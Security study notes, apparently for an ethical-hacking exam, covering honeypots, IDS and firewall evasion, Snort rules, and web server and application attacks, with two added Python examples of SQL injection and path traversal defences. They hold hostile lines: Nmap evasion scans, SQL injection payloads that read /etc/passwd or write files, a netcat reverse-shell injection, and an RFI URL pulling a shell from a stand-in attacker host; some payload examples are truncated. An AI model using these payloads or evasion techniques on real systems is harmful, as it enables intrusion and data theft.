*Honeypots are decoy systems or servers deployed alongside production systems within your network. When deployed as enticing targets for attackers, honeypots add security monitoring opportunities for blue teams and misdirect the adversary from their true target.*

- **Honeynet** - Two or more honeypots on a network form a honeynet. Honeynets and honeypots are usually implemented as parts of larger Network Intrusion Detection Systems.

- A **Honeyfarm** is a centralized collection of honeypots and analysis tools.

### **Types of Honeypots:**
1. **Low-interaction** ---> Simulates/imitates services and systems that frequently attract criminal attention. Offers a method for collecting data from blind attacks such as botnets and worm malware.
2. **High-interaction** ---> Runs real services and applications and is designed to be completely compromised, at the cost of more risk and more monitoring effort.
3. **Production** ---> Serve as decoy systems inside fully operating networks, often as part of an intrusion detection system (IDS). They deflect criminal attention from the real systems while analyzing malicious activity to help mitigate vulnerabilities.
4. **Research** ---> Used for educational purposes and security enhancement. They contain trackable data that you can trace when stolen to analyze the attack.

- **Honeypot Tools:**
  - Specter
  - Honeyd
  - KFSensor (Honeypot IDS)

## Evading with Nmap

### **Useful switches for evasion and stealth**:

Nmap Switch | Information
--|--
`-v` | Verbosity level
`-sS` | TCP SYN (half-open) scan
`-T<0-5>` | Timing template for the scan (lower is slower and stealthier)
`-f` | Use fragmented IP packets (8-byte fragments)
`--mtu <n>` | Fragment with a custom size; `n` must be a multiple of 8, and `-f` must not be given together with `--mtu`
`-D <decoy1,decoy2,ME,...>` | Cloak the scan with decoy source addresses
`-S <ip>` | Spoof the source IP address (you will not see replies unless you can sniff them; usually needs `-e <iface>` and `-Pn`)
`--send-eth` | Send raw Ethernet frames instead of raw IP packets
`--data-length <n>` | Append `n` random bytes to each probe so packets do not look like empty Nmap probes
`--source-port <port>` / `-g <port>` | Use a fixed source port (e.g. 53 or 88) to abuse rules that trust traffic from that port

---
### **Example:**

• Sends IPv4 packets fragmented to a 32-byte MTU with 50 bytes of padding from source port 8965; the fragments are too small to carry a complete TCP header, which can keep a simple IDS/firewall from recognizing the probe:

`nmap -v -sS --mtu 32 --send-eth --data-length 50 --source-port 8965 -T5 192.168.0.22`

> ⚠️ **Fragmentation is the heart of the IDS/firewall evasion techniques.** Note that `-T5` is the noisiest timing template; for stealth use `-T1` or `-T2` instead.
---

## Using SNORT
*SNORT is an open source network intrusion detection system (NIDS). Snort is a packet sniffer that monitors network traffic in real time, scrutinizing each packet closely to detect a dangerous payload or suspicious anomalies.*

- Snort is a widely deployed, open source IDS
- Includes a **sniffer**, **traffic logger** and a **protocol analyzer**
- Runs in three different modes
  - **Sniffer** - Watches packets in real time
  - **Packet logger** - Saves packets to disk for review at a later time
  - **NIDS** - Analyzes network traffic against various rule sets
- Configuration is in `/etc/snort` on Linux and `C:\snort\etc` on Windows; the file is **snort.conf**.

### **SNORT basic commands:**

**Operational modes:**
- Snort as **Sniffer** ---> `snort -v`

- Snort as **Packet logger** ---> `snort -l <log-dir>`

- Snort as **NIDS** ---> `snort -c <config/rules file>` (with `-A <mode>` to choose the alert output)

**Example of usage**:

- **`snort -i 4 -l c:\Snort\log -c c:\Snort\etc\snort.conf -T`**
  - *This command tests the Snort configuration and rules and reports any errors without starting up.*
  - `-i 4` ---> interface specifier, in this case interface 4.
  - `-l` ---> logging directory
  - `-c` ---> path to the Snort config/rules file
  - `-T` ---> test only; prevents Snort from starting up. Essentially checks whether there are any errors and whether the rules are good.

- **`snort -i 4 -c c:\Snort\etc\snort.conf -l c:\Snort\log -K ascii`**
  - *This command fires up Snort as a NIDS and logs everything in ASCII.*

**Basic commands**:
Flag | Information
-|-
`-A <mode>` | Set alert mode: fast, full, console, test or none
`-b` | Log packets in tcpdump (pcap) format (much faster!)
`-B <mask>` | Obfuscate IP addresses in alerts and packet dumps using a CIDR mask
`-c <file>` | Use config/rules file
`-C` | Print out payloads with character data only (no hex)
`-l <dir>` | Specifies the logging directory (all alerts and packet logs are placed in this directory)
`-i <iface>` | Specifies which interface Snort should listen on
`-K <mode>` | Logging mode (pcap [default], ascii, none)
`-T` | Test the configuration and rules, then exit
`-?` | Lists all switches and options and then exits

### **SNORT Rules**
*SNORT has a rules engine that allows for customization of monitoring and detection capabilities.*

- **The three basic rule actions are:**
  1. Alert
  2. Pass
  3. Log
  - (inline deployments add `drop`, `reject` and `sdrop`)
- **And the protocols a rule header can name:**
  1. TCP
  2. UDP
  3. ICMP
  - (plus `ip` to match any IP protocol)

### **Breaking down a Snort rule:**

> **`alert icmp any any -> $HOME_NET any (msg:"ICMP test"; sid:1000001; rev:1; classtype:icmp-event;)`**

Rule part | Information
-|-
`alert icmp any any -> $HOME_NET any` | **Rule Header** ⬇️
`alert` | Rule action. Snort will generate an alert when the set condition is met.
`icmp` | Protocol the rule applies to.
`any` (1st) | Source IP. Snort will look at all sources
`any` (2nd) | Source port. Snort will look at all ports
`->` | Direction. From source to destination; *(source -> destination)*; `<>` matches either direction
`$HOME_NET` | Destination IP. Uses the HOME_NET variable from snort.conf, which defines the network or networks you are trying to protect.
`any` (3rd) | Destination port. Snort will look at all ports on the protected network
`(msg:"ICMP test"; sid:1000001; rev:1; classtype:icmp-event;)` | **Rule Options** ⬇️
`msg:"ICMP test"` | Snort will include this message with the alert
`sid:1000001` | Snort rule ID. Numbers below 1,000,000 are reserved for official rules; 1,000,000 and above are for local rules, which is why local rules start at 1000001
`rev:1` | Revision number. This option allows for easier rule maintenance
`classtype:icmp-event` | Categorizes the rule as an "icmp-event", one of the predefined Snort categories. This option helps with rule organization
---
### Rules Examples:
> **`alert tcp 192.168.x.x any -> $HOME_NET 21 (msg:"FTP connection attempt"; sid:1000002; rev:1;)`**
- TCP alert for source IP address 192.168.x.x (fill in the address) on any port, to a HOME_NET destination on port 21.

> **`alert tcp $HOME_NET 21 -> any any (msg:"FTP failed login"; content:"Login or password incorrect"; sid:1000003; rev:1;)`**
- TCP alert with HOME_NET port 21 (FTP) as the source, to any destination IP address and port, when the payload contains the failed-login banner.

> **`alert tcp !$HOME_NET any -> $HOME_NET 31337 (msg:"BACKDOOR ATTEMPT-BackOrifice"; sid:1000004; rev:1;)`**
- Alerts on traffic coming from outside HOME_NET (`!` negates the variable) to the internal network on port 31337 (a local `sid` is required for the rule to load, so one is supplied).

**Example output**
- 10/19-14:48:38.543734 0:48:542:2A:67 -> 0:10:B5:3C:34:C4 type:0x800 len:0x5EA
- **xxx -> xxx TCP TTL:64 TOS:0x0 ID:18112 IpLen:20 DgmLen:1500 DF**
- Important info is bolded

## Evasion Concepts and Techniques

- **Insertion Attack** - The attacker sends packets that the IDS accepts and processes but the end host rejects (e.g. bad checksum, or a TTL that expires before reaching the host), so the IDS's view of the stream diverges from the host's.

- **Evasion** - An endpoint accepts a packet that the IDS would normally reject.
Typically executed via **fragmentation** of the attack packets to allow them to be moved through the IDS. 205 | 206 | - **Obfuscation** - Encoding the attack packets in such a way that the target is able to decode them, but the IDS is not. 207 | - Unicode 208 | - Polymorphic code 209 | - Encryption 210 | - Path manipulation to cause signature mismatch 211 | 212 | - **False Positive Generation Events** - Crafting malicious packets designed to set off alarms with hope of distracting/overwhelming IDS and operators. 213 | 214 | - **Session Splicing** - Just another type of fragmentation attack. 215 | 216 | - **Unicode encoding** - works with web requests - using Unicode characters instead of ascii can sometimes get past 217 | 218 | - **Fragmentation attack** - Splits up packets so that the IDS can't detect the real intent 219 | 220 | - **Overlapping Fragments** - Generate a bunch of tiny fragments overlapping TCP sequence numbers. 221 | 222 | - **Time-To-Live (TTL) Attack** - Requires the attacker to have inside knowledge of the target network to allow for the adjusment of the TTL values to control who gets what packets when. 223 | 224 | - **Invalid RST Packets** - Manipulation of the RST flag to trick IDS into ignoring the communication session with the target. 225 | 226 | - **Urgency Flag - URG** - Manipulation URG flag to cause the target and IDS to have different sets of packets, because the IDS processes ALL packets irrespective of the URG flag, whereas the target will only process URG traffic. 227 | 228 | - **Polymorphic Shellcode** - Blow up the pattern matching by constantly changing. 229 | 230 | - **ASCII Shellcode** - Use ASCII characters to bypass pattern matching. 231 | 232 | - **Application-Level Attacks** - Taking advantage of the compression used to transfer large files and hide attacks in compressed data, as it cannot be examined by the IDS. 

- **Desynchronization** - Manipulating the TCP SYN to fool the IDS into not paying attention to the sequence numbers of the illegitimate attack traffic, but rather giving it a false set of sequences to follow.

- **Encryption** - Using encryption to hide the attack.

- **Flood the network** - Trigger alerts that aren't your intended attack so that you confuse firewalls/IDS and network admins; overwhelming the IDS.

> ⚠️ **Slow down** - Faster scanning such as using nmap's -T5 switch will get you caught. Pros use the -T1 switch to get better results

**Tools for Evasion**
- **Nessus** - Also a vulnerability scanner
- **ADMmutate** - Creates scripts not recognizable by signature files
- **NIDSbench** - Older tool for fragmenting bits
- **Inundator** - Flooding tool

## Firewall Evasion
- **Firewalking** - Using TTL values to determine gateway ACL filters and allow for mapping of internal networks by analyzing IP packet responses; going through every port on a firewall to determine what is open.

- **Banner Grabbing** - Looking for FTP, TELNET and web server banners.

- **IP Address Spoofing** - Hijacking technique allowing an attacker to masquerade as a trusted host.

- **Source Routing** - Allows the sender of a packet to partially or fully specify the route to be used.

- **Tiny Fragments** - Successful with firewalls that ONLY CHECK the TCP header info, allowing the fragmentation of the information across multiple packets to hide the true intention of the attack.

- **ICMP Tunneling** - Allows for the tunneling of a backdoor shell via ICMP echo packets, because RFC 792 does not clearly define what kind of data goes in the data portion of the frame, allowing attack traffic to be seen as acceptable when inserted.
If firewalls do not examine the payload section of the data frame, they will let the data through, allowing the attack.

- **ACK Tunneling** - Use of the ACK flag to trick the firewall into allowing packets, as many firewalls do not check ACK packets.

- **HTTP Tunneling** - Use of HTTP traffic to 'hide' attacks.

- **SSH Tunneling** - Use of SSH to encrypt and send attack traffic.

- **MitM Attacks** - Use of DNS and routing manipulation to bypass firewalls.

- **XSS Attacks** - Allows for the exploitation of vulnerabilities around the processing of input parameters from the end user and the server responses in a web application. The attacker injects malicious HTML/JS code into the website to force the bypassing of the firewall once executed.

- *Use an IP in place of a URL - may work depending on the nature of the filtering in place*
- *Use Proxy Servers/Anonymizers - may work depending on the nature of the filtering in place*
- *ICMP Type 3 Code 13 will show that traffic is being blocked by a firewall*
- *ICMP Type 3 Code 3 tells you the client itself has the port closed*

- **Tools**
  - CovertTCP
  - ICMP Shell
  - 007 Shell
  - The best way around a firewall will always be a compromised internal machine

## How to detect a Honeypot
*Probe services running on them; ports that show a service is available but **deny a three-way handshake may indicate that the system is a honeypot**.*

* **Layer 7 (Application)** - Examine the latency of responses from the server
* **Layer 4 (Transport)** - Examine the TCP window size, looking for continuous acknowledgement of incoming packets even when the window size is set to 0.

* **Layer 2 (Data Link)** - If you are on the same network as the honeypot, **look for MAC addresses** in packets that indicate the presence of a **'Black Hole'** (`0:0:f:ff:ff:ff`)

> ⚠️ **The exam will not cover every piece of information presented here, but it is good to have a general idea.**

* If the honeypot is virtualized, look for the vendor-assigned MAC address ranges as published by IEEE.
* If the honeypot is the **Honeyd** type, use time-based TCP fingerprinting methods to detect it.
* To detect a **User-Mode Linux (UML) honeypot**, analyze `proc/mounts`, `proc/interrupts` and `proc/cmdline`, which would have UML-specific settings and information.
* To detect Sebek-based honeypots: Sebek logs everything that is accessed via `read()` **before** sending it to the network, causing congestion that can be an indicator.
* To detect **snort_inline honeypots**, analyze the outgoing packets by capturing the snort_inline modified packets through another

/13-Hacking-Web-Servers.md:
# Hacking Web Servers

## Web Server Attack Methodology

- **Information Gathering** - Internet searches, whois, reviewing robots.txt

- **Web Server Footprinting** - banner grabbing
  - **Tools**
    - Netcraft
    - HTTPRecon
    - theHarvester
    - ID Serve
    - HTTPrint
    - nmap
      - `nmap --script http-trace -p80 localhost`
        - Detects a vulnerable TRACE method
      - `nmap --script http-google-email <target>`
        - Lists email addresses
      - `nmap --script hostmap-* <target>`
        - Discovers virtual hosts on the IP address you are trying to footprint; `*` is replaced by an online DB such as IP2Hosts
      - `nmap --script http-enum -p80 <target>`
        - Enumerates common web apps
      - `nmap --script http-robots.txt -p 80 <target>`
        - Grabs the robots.txt file

- **Website Mirroring** - brings the site to your own machine to examine its structure, etc.
  - **Tools**
    - Wget
    - BlackWidow
    - HTTrack
    - WebCopier Pro
    - Web Ripper
    - SurfOffline

- **Vulnerability Scanning** - scans the web server for vulnerabilities
  - **Tools**
    - Nessus
    - Nikto - specifically suited for web servers; still very noisy like Nessus

- **Session Hijacking**

- **Web Server Password Cracking**

## Web Server Architecture

- **Most Popular Servers** - Apache, Microsoft IIS and Nginx
  - Apache runs configurations as part of a module within special files (httpd.conf, etc.)
  - IIS runs all applications in the context of LOCAL_SYSTEM
  - IIS 5 had a ton of bugs - easy to get into
- **N-Tier Architecture** - distributes processes across multiple servers; normally as three tiers: presentation (web), logic (application) and data (database)
- **Error Reporting** - should not be showing errors in production; easy to glean information
- **HTML** - markup language used to display web pages
- **HTTP Request Methods**
  - **GET** - retrieves whatever information is in the URL; sending data is done in the URL
  - **HEAD** - identical to GET except no body is returned
  - **POST** - sends data via the body - data not shown in the URL or in history
  - **PUT** - requests that data be stored at the URL
  - **DELETE** - requests that the origin server delete the resource
  - **TRACE** - requests an application-layer loopback of the message
  - **CONNECT** - reserved for use with a proxy
  - Both POST and GET can be manipulated by a web proxy
- **HTTP Error Messages**
  - **1xx: Informational** - request received, continuing
  - **2xx: Success** - action received, understood and accepted
  - **3xx: Redirection** - further action must be taken
  - **4xx: Client Error** - request contains bad syntax or cannot be fulfilled
  - **5xx: Server Error** - server failed to
fulfill an apparently valid request

## Web Server Attacks

- **DNS Amplification** - Uses recursive DNS to DoS a target; amplifies DNS answers to the target until it can't do anything

- **Directory Traversal** (../ or dot-dot-slash) - requests a file that should not be accessible from the web server
  - Example: http://www.example.com/../../../../etc/passwd
  - Can use Unicode/URL encoding to possibly evade the IDS - %2e for dot and %2f for slash

- **Parameter Tampering** (URL Tampering) - Manipulating parameters within the URL to achieve escalation or other changes

- **Hidden Field Tampering** - Modifying hidden form fields, producing unintended results

- **HTTP Response Splitting** - An attacker passes malicious data to a vulnerable application through the HTTP response header.

- **Web Cache Poisoning** - Replacing the cache on a box with a malicious version of it

- **WFETCH** - Microsoft tool that allows you to craft HTTP requests to see response data

- **Misconfiguration Attack** - Same as before - improper configuration of a web server.
(e.g. default settings like admin/password credentials; lack of security controls)

- **Password Attack** - Attempting to crack passwords related to web resources

- **Connection String Parameter Pollution** - Injection attack that uses semicolons to take advantage of databases that use this separation method

- **Web Defacement** - Simply modifying a web page to say something else

- **DoS/DDoS** - Compromise availability

- **Shellshock** - Causes Bash to unintentionally execute commands when commands are concatenated on the end of function definitions

- **Tools**
  - **Brutus** - brute force web passwords over HTTP
  - **Hydra** - network login cracker
  - **Metasploit**
    - Basic working: libraries use interfaces and modules to send attacks to services
    - **Exploits** hold the actual exploit
    - **Payload** contains the arbitrary code run if the exploit is successful
    - **Auxiliary** used for one-off actions (like a scan)
    - **NOPS** used for buffer-overflow type operations

/14-Hacking-Web-Applications.md:
# Hacking Web Applications

## Web Organizations

- **Internet Engineering Task Force (IETF)** - Creates engineering documents to help make the Internet work better.
- **World Wide Web Consortium (W3C)** - A standards-developing community.
- **Open Web Application Security Project (OWASP)** - Organization focused on improving the security of software.

## OWASP Web Top 10


*The [OWASP Top 10](https://owasp.org/www-project-top-ten/) is a standard awareness document for developers and web application security. It represents a broad consensus about the most critical security risks to web applications.*

- **A1 - Injection Flaws** - SQL, OS and LDAP injection
- **A2 - Broken Authentication and Session Management** - functions related to authentication and session management that aren't implemented correctly
- **A3 - Sensitive Data Exposure** - not properly protecting sensitive data (SSN, CC numbers, etc.)
- **A4 - XML External Entities (XXE)** - exploiting XML processors by uploading hostile content in an XML document
- **A5 - Broken Access Control** - having improper controls on areas that should be protected
- **A6 - Security Misconfiguration** - across all parts of the server and application
- **A7 - Cross-Site Scripting (XSS)** - taking untrusted data and sending it without input validation
- **A8 - Insecure Deserialization** - improperly de-serializing data
- **A9 - Using Components with Known Vulnerabilities** - libraries and frameworks that have known security holes
- **A10 - Insufficient Logging and Monitoring** - not having enough logging to detect attacks

**WebGoat** - project maintained by OWASP which is a deliberately insecure web application meant to be tested


## Web Application Attacks

- Most often hacked because of inherent weaknesses built into the program
- First step is to identify entry points (POST data, URL parameters, cookies, headers, etc.)
  - **Tools for Identifying Entry Points**
    - WebScarab
    - HTTPPrint
    - BurpSuite
- **Web 2.0** - dynamic applications; have a larger attack surface due to simultaneous communication

---
## **SQL Injection**

Injecting SQL commands into input fields to produce output
- Data Handling - Definition (DDL), manipulation (DML) and control (DCL)

SQL injection usually occurs when you ask a user for input, like their username/userid, and instead of a name/id, the user gives you an SQL statement that you will unknowingly run on your database.

- **SQLi is used for**:
  - Bypass authentication
  - Extract information
  - Insert injection


**SQL Syntax - Basics:**

SQL Command | Info.
-- | :--
``SELECT`` | extracts data from a database
``UPDATE`` | updates data in a database
``DELETE`` | deletes data from a database
``INSERT INTO`` | inserts new data into a database
``ALTER TABLE`` | modifies a table
``DROP TABLE`` | deletes a table
``CREATE INDEX`` | creates an index (search key)
``DROP INDEX`` | deletes an index
``UNION`` | is used to combine the result-set of two or more SELECT statements.

---

### SQL Injection in action:

- On the UserId input field, you can enter:
  - `105 OR 1=1`.

- This is valid and will not return only UserId 105; the injection returns ALL rows from the "Users" table, **since OR 1=1 is always TRUE**.
Then, the SQL statement will look like this:
  - `SELECT * FROM Users WHERE UserId = 105 OR 1=1;`

- A double dash ( `--` ) tells the server to ignore the rest of the query (in this example, the password check)

> ⚠️ **A basic test to see if SQL injection is possible is just inserting a single quote ( `'` )**
> - Can be on an input field or in the URL
> - This will make the web app return a SQL syntax error, meaning that you are able to inject SQL queries.


**Bypassing authentication:**
- `admin' or 1=1 -- `
  - Basically tells the server **if 1 = 1 (always true)** to allow the login, and the double dash `--` comments out the rest of the query, in this case the password check.
  - variations: `1' or 1=1 #`

- Based on `=` always being true:
  - `" or ""="` --> The SQL above is valid and will return all rows from the "Users" table, since OR ""="" is always TRUE.
  - This is valid and the SQL statement behind the login form will look like this: ` SELECT * FROM Users WHERE Name ="John Doe" AND Pass ="myPass" `

**Enumerating:**
- `1' union all select 1,user() #`
  - Shows which database user the service is running as

- `user' UNION ALL select 1,table_name,3,4,5 FROM information_schema.tables`
  - Dumps the table names

**Load/Reading a file:**
- `bob' union all select 1,load_file("/etc/passwd"),3,4,5 --`
  - Reads the /etc/passwd file

**Writing a file:**
- `bob' union all select 1,"Test",3,4,5 into outfile '/tmp/test.txt'--`
  - Writes the selected rows to a file. Column and line terminators can be specified to produce a specific output format.

**Fuzzing** - inputting random data into a target to see what will happen

**Tautology** - using always-true statements to test SQL (e.g.
`1=1`)

**In-band SQL injection** - uses the same communication channel to perform the attack

- Usually is when the data pulled can fit into the data exported (where data goes to a web table)

- Best for using `UNION` queries

**Out-of-band SQL injection** - uses different communication channels (e.g. export results to a file on the web server)

**Blind/inferential** - error messages and screen returns don't occur; usually you have to guess whether the command worked or use timing to know

- **SQLi Tools:**
  - Sqlmap
  - sqlninja
  - Havij
  - SQLBrute
  - Pangolin
  - SQLExec
  - Absinthe
  - BobCat

---

### **Broken Authentication**
Broken Authentication usually occurs due to issues with the application's authentication mechanism:

- **Credential Stuffing and Brute Force Attacks**
- **Weak Passwords & Recovery Process**
- **Mismanagement of Session IDs**

*An attacker can gain control over user accounts in a system. In the worst case, it could help them gain complete control over the system.*

---

### **Command Injection**
Execution of arbitrary commands on the host operating system via a vulnerable application.
- Injection is possible when an application passes unsafe user-supplied data (forms, cookies, HTTP headers etc.) to a system shell.
- Web apps sometimes need to execute OS commands to communicate with the underlying host OS and the file system. This can be done to run system commands, launch applications written in another programming language, or run shell, python, perl, or PHP scripts.

**Example**:
- Imagine a vulnerable application that has a common function that passes an **IP address from a user input** to the system's **ping command**.
  - User input: `127.0.0.1`
  - The following command is executed on the host OS:
    - `ping -c 5 127.0.0.1`
  - It is possible to break out of the ping command to execute the attacker's arbitrary commands:
    - `ping -c 5 127.0.0.1; id`
  - If the system is vulnerable the output will look like this (showing the result of two OS commands, `ping` and `id`):

```console
--- 127.0.0.1 ping statistics ---
5 packets transmitted, 5 received, 0% packet loss, time 3999ms
rtt min/avg/max/mdev = 0.023/0.056/0.074/0.021 ms

uid=0(root) gid=0(root) groups=0(root)
```

- Without input sanitizing the attacker can get a reverse shell:
  - `127.0.0.1; nc -nv 4444 -e /bin/bash`

---

### **Sensitive Data Exposure**

When the web application doesn't adequately protect sensitive information like **session tokens, passwords, banking information, location, health data**, or any other similar crucial data whose leak can be critical for the user.

**Examples**:
1. *An application **stores credit card numbers in a database without encryption**. If an attacker gets access to the database through SQL injection, they could easily get the credit card numbers.*

2. **An application stores passwords in the database using unsalted or simple hashes**. An attacker can expose the unsalted hashes using Rainbow Table attacks.

3. **A website that doesn't enforce TLS or uses weak encryption.** An attacker could monitor network traffic and downgrade the connections from HTTPS to HTTP. Then, they can intercept the requests and steal the user's session cookie.

---

### **XXE - XML External Entities**
Is a type of attack against an application that parses XML input.
This attack occurs when **XML input containing a reference to an external entity is processed by a weakly configured XML parser.**

- Attackers can supply XML files with specially crafted DOCTYPE definitions to an XML parser with a weak security configuration to perform **path traversal, port scanning, and numerous attacks, including denial of service, server-side request forgery (SSRF), or even remote code execution.**

**Example**:

- External entities can reference URIs to retrieve content from local files or network resources.
- This payload will return the content of the `/etc/passwd` file on the target system's OS (for Windows you could reference `file:///c:/boot.ini`):

```xml
]>
&xxe;
```

___

### **RFI - Remote File Inclusion**

Is a method that allows an attacker to employ a script to include a remotely hosted file on the web server. The vulnerability promoting RFI is largely found on websites running on PHP. This is because PHP supports the ability to `include` or `require` additional files within a script.

**Vulnerable PHP Example**:

> **`$incfile = $_REQUEST["file"]; include($incfile.".php");`**

- The first line extracts the file parameter value from the HTTP request, while the second line uses that value to dynamically set the file name. Without any appropriate sanitization of the file parameter value, this code can be exploited for unauthorized file uploads.

- For example, the URL below contains an external reference to a reverse shell made in a PHP file, stored in a remote location:
  - `http://www.example.com/vuln_page.php?file=http://www.hacker.com/netcat.php_`

---


### **LFI - Local File Inclusion**:
is very much similar to RFI.
The only difference being that in LFI, in order to carry out the attack, instead of including remote files the attacker has to use local files (i.e. only files already on the current server can be used to execute a malicious script).

**Examples**:
- `http://example.com/?file=../../uploads/evil.php`

---

### **Directory Traversal**
An attacker can get sensitive information like the contents of the /etc/passwd file, which contains a list of users on the server; log files, source code, access.log and so on.

**Examples:**
- `http://example.com/events.php?file=../../../../etc/passwd`
  - An attacker can get the contents of **/etc/passwd** (the file that contains a list of users on the server).

*Similarly, an attacker may leverage the Directory Traversal vulnerability to access **log files** (for example, **Apache access.log or error.log**), **source code**, and other sensitive information. This information may then be used to advance an attack.*

---
### **XSS (Cross-site scripting)**
Inputting JavaScript into a web form input field that alters what the page does.
- Can also be passed via URL
- Can be malicious by accessing cookies and sending them to a remote host
- Can be mitigated by setting the **HttpOnly** flag for cookies; but many hackers can circumvent this in order to execute XSS payloads.

### Types of XSS:

1. **Stored XSS** (Persistent or Type-I) - stores the XSS in a forum or similar for multiple people to access.

2. **Reflected XSS** (also called non-persistent XSS); when an application receives data in an HTTP request and includes that data within the immediate response in an unsafe way.

3. **DOM Based XSS** (or as it is called in some texts, "type-0 XSS") is an XSS attack wherein the attack payload is executed as a result of modifying the DOM "environment" in the victim's browser used by the original client-side script, so that the client-side code runs in an "unexpected" manner.

Examples of XSS payloads:
- `">`
- ` `
- `p=`

*Note: they vary regarding the filtering, validation and WAF capabilities.*

---
### **HTML Injection**
This vulnerability **occurs when user input is not correctly sanitized and the output is not encoded.** An injection allows the attacker to send a malicious HTML page to a victim.

---
### **LDAP Injection**
Exploits applications that construct LDAP statements
- Format for LDAP injection includes `)(&)`
---

### **SOAP Injection**
Inject query strings in order to bypass authentication
- SOAP uses XML to format information
- Messages are "one way" in nature
---
### **Buffer Overflow**
Attempts to write data into an application's buffer area to overwrite adjacent memory, execute code or crash a system
- Inputs more data than the buffer is allowed
- Includes stack, heap, NOP sleds and more
- **Canaries** - systems can monitor these - if they are changed, they indicate a buffer overflow has occurred; placed between the buffer and control data
---

### **Cross-Site Request Forgery (CSRF)**
Forces an end user to execute unwanted actions on an app they're already authenticated to
- Inherits the identity and privileges of the victim to perform an undesired function on the victim's behalf
- Captures the session and sends a request based off the logged-in user's credentials
- Can be mitigated by sending **random challenge tokens**

---

### **Session Fixation**
Attacker logs into a legitimate site and pulls a session ID; sends a link with the session ID to the victim. Once the victim logs in, the attacker can now log in and run with the user's credentials

- **Cookies** - small text-based files stored that contain information like preferences, session details or shopping cart contents
  - Can be manipulated to change functionality (e.g. changing a cookie that says "ADMIN=no" to "yes")
  - Sometimes, but rarely, can also contain passwords

---
### **HTTP Response Splitting**
Adds header response data to an input field so the server splits the response
- Can be used to redirect a user to a malicious site
- Is not an attack in and of itself - must be combined with another attack
- With HTTP Response Splitting, it is possible to mount various kinds of attacks:
  - XSS
  - Web Cache Poisoning (defacement)
  - Browser cache poisoning
  - Hijacking pages with user-specific information
---

### **Insecure direct object references (IDOR)**
Is a common vulnerability that occurs when a reference to an **internal implementation object is exposed without any other access control**. The vulnerability is often easy to discover and allows attackers to access unauthorized data.
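The login and UserId payloads from the SQL Injection section, run against a vulnerable string-built query and its parameterized fix (the "SQL parameterization" countermeasure). This is an added example, not code from the original notes; the in-memory SQLite table, its users and the function names are constructed here.

```python
"""Vulnerable string-built query beside its parameterized fix, run against an in-memory
SQLite table (added example, not the original notes' code). Table and users are constructed."""
import sqlite3


def setup_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE Users (UserId INTEGER, Name TEXT, Pass TEXT)")
    conn.executemany("INSERT INTO Users VALUES (?, ?, ?)",
                     [(1, "admin", "s3cret"), (105, "alice", "pw-alice"), (200, "bob", "pw-bob")])
    return conn


def login_vulnerable(conn, name: str, password: str):
    """Builds the WHERE clause by string concatenation: the input becomes SQL syntax,
    so a quote closes the literal and '--' comments out the password check."""
    sql = f"SELECT Name FROM Users WHERE Name = '{name}' AND Pass = '{password}'"
    return [row[0] for row in conn.execute(sql)]


def login_parameterized(conn, name: str, password: str):
    """Same query with placeholders: the driver binds the values separately from the
    statement, so quotes and comment markers in the input are data, never SQL."""
    sql = "SELECT Name FROM Users WHERE Name = ? AND Pass = ?"
    return [row[0] for row in conn.execute(sql, (name, password))]


def lookup_by_id_vulnerable(conn, user_id: str):
    """Numeric field with no quoting at all: the tautology '105 OR 1=1' widens the result."""
    return [row[0] for row in conn.execute(f"SELECT Name FROM Users WHERE UserId = {user_id}")]


def lookup_by_id_parameterized(conn, user_id: str):
    """Validate the type first, then bind: a non-numeric id is rejected before any SQL runs."""
    if not user_id.isdigit():
        raise ValueError("UserId must be numeric")
    return [row[0] for row in conn.execute("SELECT Name FROM Users WHERE UserId = ?", (int(user_id),))]


def demo() -> dict:
    """Run the notes' payloads against both versions and return the outcomes."""
    conn = setup_db()
    out = {
        "vuln_login": login_vulnerable(conn, "admin' or 1=1 -- ", "wrong"),
        "safe_login": login_parameterized(conn, "admin' or 1=1 -- ", "wrong"),
        "vuln_id": lookup_by_id_vulnerable(conn, "105 OR 1=1"),
    }
    try:
        out["safe_id"] = lookup_by_id_parameterized(conn, "105 OR 1=1")
    except ValueError as e:
        out["safe_id"] = f"rejected: {e}"
    return out


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key:>10}: {value}")
```

The vulnerable login returns every user for `admin' or 1=1 -- ` because the comment swallows the `AND Pass = ...` clause; the parameterized version returns nothing, since no user is literally named `admin' or 1=1 -- `. For the numeric lookup the tautology is caught by the type check before the query is built, which also gives a clean place to log the attempt.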
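A document-root confinement check for the Directory Traversal and LFI examples above, which also covers the web-server notes' `%2e`/`%2f` encoding trick. This is an added example, not from the original notes; the `/srv/www` root and the function names are assumptions made for the example.

```python
"""Canonicalise-then-check guard against ../ traversal and LFI (added example, not the
original notes' code). Rather than blacklisting '..', it normalises the decoded path and
verifies the result still sits under the document root; the root path is constructed."""
import os
from urllib.parse import unquote

DOCROOT = "/srv/www"  # constructed document root for the example


class PathTraversal(ValueError):
    pass


def decode_fully(value: str, rounds: int = 3) -> str:
    """Percent-decode until stable: double encoding (%252e) hides a dot behind one decode."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            return value
        value = decoded
    raise PathTraversal("too many encoding layers")


def resolve_under_root(root: str, requested: str) -> str:
    """Return the absolute path for `requested`, or raise PathTraversal if it escapes `root`."""
    decoded = decode_fully(requested).replace("\\", "/")
    if "\x00" in decoded:
        raise PathTraversal("NUL byte in path")
    root_abs = os.path.realpath(root)
    # lstrip keeps an absolute request like /etc/passwd relative to the root
    candidate = os.path.realpath(os.path.join(root_abs, decoded.lstrip("/")))
    if candidate != root_abs and not candidate.startswith(root_abs + os.sep):
        raise PathTraversal(f"{requested!r} resolves outside the document root")
    return candidate


def classify(requested: str, root: str = DOCROOT) -> str:
    """Label one request value as 'allowed' or 'blocked: <reason>' (handy for log review)."""
    try:
        resolve_under_root(root, requested)
        return "allowed"
    except PathTraversal as e:
        return f"blocked: {e}"


# Constructed request values, including the payloads quoted in the notes.
SAMPLES = [
    "images/logo.png",
    "../../../../etc/passwd",
    "..%2f..%2fetc%2fpasswd",
    "%252e%252e/%252e%252e/etc/passwd",
    "../../uploads/evil.php",
    "/etc/passwd",
]

if __name__ == "__main__":
    for s in SAMPLES:
        print(f"{s:40} -> {classify(s)}")
```

Note that the absolute request `/etc/passwd` is reported as allowed: after `lstrip("/")` it maps to `/srv/www/etc/passwd`, which is inside the root, and serving a file from there is the correct behaviour for a web server. The guard's job is root confinement, not guessing which file names look suspicious.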


---
## Countermeasures
Input scrubbing for injection, SQL parameterization for SQL injection, input validation and sanitization for injections, keeping servers patched, turning off unnecessary services, ports and protocols

/14-Pentesting.md:
# Pentesting
